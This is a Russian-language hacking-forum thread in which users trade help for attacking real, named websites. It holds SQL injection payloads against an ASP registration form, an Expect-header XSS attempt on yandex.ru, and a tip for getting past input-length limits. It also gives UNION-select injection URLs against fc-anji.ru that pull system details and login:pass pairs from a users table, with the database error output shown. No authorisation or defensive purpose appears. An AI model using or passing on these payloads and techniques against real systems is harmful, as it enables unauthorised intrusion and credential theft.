Добрый вечер,подскажите как реализовать уязвимость: 1.найден уязвимый параметр login при регистрации, ввожу ' выдаётся следующее: Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '''. /forums/Advising/register.asp, line 49 2.ввожу Code: ' having 1=1-- в уязвимое поле. Выдаётся: Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Column 'members.M_Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /forums/Advising/register.asp, line 49 т.е. я узнал,что имя таблицы: "members", а имя первой колонки: "M_Name"??? Что делать дальше?
ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности А в логине ограничение на 50 символов нормальный запрос не воткнёшь
Начали со скули, скатились к досу. Блин может я туплю, но это не то ,помоему.Сдесь эксплоит непокатит "This happens only to servers which respond a runtime error (System.Web.HttpException)" А у нас не та ошибка xcedz объясни
Народ, нашёл такую вот дыру на Яндексе( да лан вам, ну сканер помог()). Короче, атправляем такой запрос : GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.yandex.ru Cookie: yandexuid=4833131207762812;my=YwECAAMHAwEBFwgIBQYDAgQJCAEMATIOAQAVBQQBAgSnExYBABsDAAADAA%3D%3D;YX_SEARCHPREFS=favicons:1,lang:all,ton:1,banners:1,search_form:topbot,numdoc:10,target:_blank,desc:sometimes,lr:,wstat:1,t:2,family:1;;fyandex=1 Connection: Close Expect: <script>alert('suka')</script> Pragma: no-cache И, походу, срабатывает ( если использывать SQL INJ TOOL > Show in Browzer). Я так и не понял, сработало это или нет, пассивная это XSS или нет (с моим-то опытом да )))) ), но я читал, что НТТР не даёт провести XSS через поле заголовка EXPECT, ибо так и было задумано ))). Там атак много конечно: CRLF, подделка куки, трейс( от которого понту нет,вы знаете ) ))).До черта ещё сканировать будет я чувствую))).Так вот пара вопросов: сработала у мя в таком случае XSS ? если да, то пассивка или активко о_О ? И ещё : зависит ли скорость сканирования только от объёма канала и его загруженности ? Буду весьма признателен за ответы, ня ^_____^ Также нашёл редиректы на произвольный юрл в некоторых скриптах, которые толком ничо не дают)))( ну кто на такое купится,да и это не ХСС, код не внедряетс, тобишь ночевать не будет на страничке ( ). P.S. Учимся ломать мир о_О
Велемир невидно самого пути к уязвиомому скрипту запрос должен выглядить так GET http://yandex.ru/ HTTP/1.0 итд..
Тык а путь же / ,тобишь index.html. В запросе нету уязвимого скрипт,мошь просто ошибка высветилась и выполнился скрипт <script>alert('suka')</script>.Эт надо делать через xmlHTTP походу... This script is vulnerable to Cookie manipulation attacks. By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. Affected items /cgi-bin/banner_count.pl /cgi-bin/customize.pl /cgi-bin/save-setup.pl /cy Тож дырень непонятная.Понту от того,что я могу менять куки?:Р Сканер тупит имхо...хотя, мона мета теги менять...Вот ток как хз
2SQL~In[J]ecTi0n, ник обязывает знать, судя по ошибкам там MS Access. Тяжеловато провести инъекцию, но возможно, я делал, чего и тебе желаю...)
Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest Необязательно.
Там обычный MSSQL: Code: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) По-этому для дальнейшего проведения SQL~In[J]ecTi0n читайте статью кеша https://forum.antichat.ru/threadnav30501-1-10.html там все описано в полном объеме. А по поводу Ограничение в 50 символов обходится, например простым сохранением странички на локале и дописыванием удаленного обработчика в коде html. Хотя мона просто воспользоваться FireFox Post Extension например или руками отправить пост...
кто знает в *.pl страницах существуют существенные уязвимости например при которых мона файлик на комп удаленный заливать..... xss не интерисуют.... там соединение https и вдобавок ни каких cookie.... да и про VS Billing v. 1.0 rc2 (c)2003 ктонить слышал???
Знающие люди,кому не сложно помочь,стукните в 380-225-866 P.S. Статью [ cash ] 'a уже до дыр зачитал.Не могу выполнить ни одно из действий,описанных там,т.к.постоянно выдаётся ошибка "Incorrect syntax near <оператор>"
А что если при запросе из таблицы users по клонкам login,pass вернулось 'voidass' База пустая чтоли? :Р Версия бд 4.1.18 Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141 Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' использовал знаменитый алгоритм шифрования AES:РРР http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@version_compile_os,0x71),0x71),3,4,5,6/* portbld-freebsd5.4 http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@basedir,0x71),0x71),3,4,5,6/* Тут неполучилось:Р,с одним @ тоже))
иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать. Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе. concat(user,':',pass) concat_ws(0x3a,user,pass)
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login,pass),3,4,5,6+from+users/* Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе: void: pass )))))) Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?)))) Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (